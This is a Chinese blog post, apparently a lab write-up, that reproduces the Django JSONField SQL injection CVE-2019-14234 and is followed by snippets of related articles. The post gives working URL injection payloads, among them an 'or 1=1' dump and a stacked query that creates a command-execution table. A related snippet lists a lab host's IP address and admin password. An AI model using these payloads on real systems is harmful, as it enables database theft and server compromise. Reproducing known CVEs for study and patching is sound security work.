django SQL注入(CVE-2019-14234)

于 2024-02-26 18:00:04 发布
阅读量594 收藏 3
点赞数 10
文章标签: sqlite 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/136305644
版权

漏洞描述:

Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。

在1.11.x before 1.11.23、2.1.x before 2.1.11和2.2.x before 2.2.4的版本中,Django存在安全漏洞,Django中使用了JSONField并且查询的“键名”可控,导致存在SQL注入漏洞。

后台登录页面:http://ip:port/admin

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问http://ip:port/admin,进入后台管理系统

3.构造payload,令b=123

payload:

http://ip:port/admin/vuln/collection/?detail__a%27b=123

4.查询所有结果

http://ip:port/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

5.结合CVE-2019-9193我们尝试进行命令注入

http://ip:port/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

显示没有要获取的结果,证明命令正常执行

借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;数据库被恶意操作;服务器被远程控制,被安装后门。

修复建议:

  1. 升级版本。

慕筱蚺
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-14234 Django JSONField SQL注入漏洞复现
m0_48520508的博客
07-28 2519
0x01简介 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有
CVE-2019-14234 Django JSONField SQL注入漏洞
weixin_45260839的博客
06-25 1699
CVE-2019-14234 Django JSONField SQL注入漏洞
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234
weixin_56537388的博客
11-24 657
Django2019年8月1日 日发布了安全更新,修复了 JSONField 和 HStoreField 两个模型字段的 SQL 注入漏洞。该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。
Django SQL注入CVE-2022-28346)
weixin_46801402的博客
11-01 1103
Django SQL注入CVE-2022-28346)
django-sql注入攻击
随风逆流的蒲公英的博客
06-18 422
什么是sql注入注入本质上就是把输入的数据变成可执行的程序语句,所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的查询,篡改命令。它能够轻易的绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所有的漏洞。
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
Django_CVE-2020-9402_Geo_SQL注入分析 Django 框架是一个流行的 Python Web 框架,它提供了许多实用的功能,包括 GIS( Geographic Information System)查询功能。然而,在 Django 中的 GIS 查询中存在一个_sql ...
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更高建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
高效易用Django流程引擎源码 - django-lb-workflow
最新发布
03-25
项目概述:django-lb-workflow 是一个基于Python的高效易用Django流程引擎源码,旨在轻松集成至现有系统。该项目主要由68个Python文件、30个HTML文件以及其他相关文件构成,共计136个文件。其中还包括了HTML模板、...
CVE-2020-7471:django 漏洞:CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 的漏洞环境和 POC
04-14
CVE-2020-7471这个仓库提供 CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 漏洞的环境和 POC受影响的 django 版本1.11 到 1.11.28(不含)2.2 到 2.2.10(不含)3.0 到 3.0.3(不含)下载使用前...
漏洞django-cve_2019_14234 SQL注入
m0_62791432的博客
05-13 476
访问http://110.40.154.100:8000/进入页面 登录环境: 访问:http://1.1.1.1:8000/admin/vuln/collection/输入默认账户密码 账户:adimin 密码:a123123123 登录成功后看到以下界面:
16 - vulhub - Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234
易编橙 · 终身成长社群,相遇已是上上签!
11-03 1175
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQ
vulfocus——Django SQL注入(CVE-2021-35042)
m0_62063669的博客
09-17 856
如果 order_by 是来自 Web 应用程序客户端的不受信任的输入,则 3.1.13 之前的 Django 3.1.x 和 3.2.5 之前的 3.2.x 允许 QuerySet.order_by SQL 注入。2.根据提示访问,根据返回的信息可得出order传入的值可控。3.利用堆叠+报错进行注入(flag在报错页面的下面)(当为“id”正序排列,当为“-id”反序排列)
django-cve_2019_14234
m0_67612076的博客
05-13 305
地址:http://110.40.154.100:8080/ 打开:http://110.40.154.100:8080/admin 账号是:admin 密码随便输入,然后用burpsuite抓包 3.1 打开burpsuite进行抓包 进入proxy 点击Intercept is off 暴力破解 密码:a123123123 进入后台 测试是否存在注入点:http://110.40.154.100:8080/admin/vuln/collection/?detail__a%27
django中安全sql注入
reblue520的专栏
12-16 387
模拟sql注入 使用原生sql语句编写login登录逻辑 class LoginUnsafeView(View): def get(self, request): return render(request, "login.html", {}) def post(self, request): user_name...
【WEB攻防】【CVE-2019-14234Django JSONField SQL注入 复现
AAAAAAAAAAAA66的博客
12-19 1630
BMZCTF 【CVE-2019-14234Django JSONField SQL注入
Django 2020-9402 Geo SQL注入漏洞详解与修复分析
Django CVE-2020-9402是一个针对Oracle数据库SQL注入漏洞,主要影响的是GIS(Geographic Information System)功能中的函数和聚合操作。这个漏洞源于对GIS查询中的`tolerance`参数的不当处理,该参数允许用户输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值